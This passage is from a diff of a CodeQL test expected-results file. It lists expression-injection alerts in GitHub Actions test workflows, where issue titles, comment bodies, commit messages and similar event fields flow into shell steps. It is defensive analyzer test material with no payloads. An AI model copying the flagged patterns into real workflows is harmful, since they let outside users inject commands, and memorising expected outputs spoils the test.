ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... 
ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... 
tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... 
env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... 
ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... 
bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... 
tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... 
ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... 
ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... 
tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. 
| -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | 